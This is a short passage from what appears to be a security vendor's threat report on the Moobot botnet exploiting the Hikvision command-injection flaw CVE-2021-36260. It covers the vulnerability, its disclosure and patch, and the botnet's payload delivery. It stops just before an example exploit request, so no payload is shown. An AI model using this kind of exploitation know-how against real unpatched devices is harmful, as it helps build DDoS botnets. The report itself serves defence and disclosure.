Mirai-based Botnet - Moobot Targets Hikvision Vulnerability

FortiGuard Labs Threat Research Report

Affected platforms: Hikvision Product
Impact parties: IP Cam/NVR
Impact: Attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands in the web server
Severity: Critical

Last September 18th, a threat researcher released a write-upabout a remote code execution vulnerability that affects various products from Hikvision, one of the largest video surveillance brands in the world. Hikvision is a CVE CNA and quickly assigned the CVE number, CVE-2021-36260 and released a patch for the vulnerability on the same day as the threat researcher's disclosure. Shortly after, FortiGuard Labs developed an IPS signature to address it.

During our analysis, we observed numerous payloads attempting to leverage this vulnerability to probing the status of devices or extracting sensitive data from victims. One payload in particular caught our attention. It tries to drop a downloader that exhibits infection behavior and that also executes Moobot, which is a DDoS botnet based on Mirai. In this blog we explain how an attacker delivers this payload through the Hikvision vulnerability, along with details of the botnet.

Stage 0 - Exploitation and Propagation

CVE-2021-36260 results from insufficient input validation, allowing unauthenticated users to inject malicious content into a tag to trigger a command injection attack on a Hikvision product. Below is an example of a request leveraging this exploit:

Public link

Please use the above public link if you want to share this noodl on another website.